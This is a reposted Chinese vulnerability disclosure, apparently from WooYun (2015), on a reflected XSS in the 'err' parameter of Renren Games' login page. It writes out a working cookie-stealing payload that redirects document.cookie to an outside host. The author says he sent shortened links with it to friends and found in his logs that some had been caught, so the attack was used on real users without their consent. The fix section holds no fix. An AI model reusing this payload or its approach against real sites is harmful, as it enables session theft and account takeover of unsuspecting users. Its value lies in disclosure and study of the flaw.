记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

人人游戏xss定向盗取用户cookie可登陆

2015-04-06 21:35

问题出现在http://wan.renren.com/login/登陆页面

renren.png





我们构造这样一个链接:http://wan.renren.com/login/?err=1(这里err是一提示参数)

人人1.png





我们很自然的想到了这样:http://wan.renren.com/login/?err=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

cookie人人.png





OK,其危害性呢。我们利用http://wan.renren.com/login/?err=<script>document.location="http://xsssssss.com/test/1.php?c="+document.cookie;</script>

构造一个短地址,然后定向发给好友

然后就去睡大觉。。

看一下日志信息,已经有小朋友中招了

cookie9.png

漏洞证明:

http://wan.renren.com/login/?err=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

cookie人人.png





登陆.png

修复方案:

code 区域
新年快乐!

知识来源: www.wooyun.org/bugs/wooyun-2015-097749

阅读:82018 | 评论:0 | 标签:xss

想收藏或者和大家分享这篇好文章→复制链接地址

“人人游戏xss定向盗取用户cookie可登陆”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词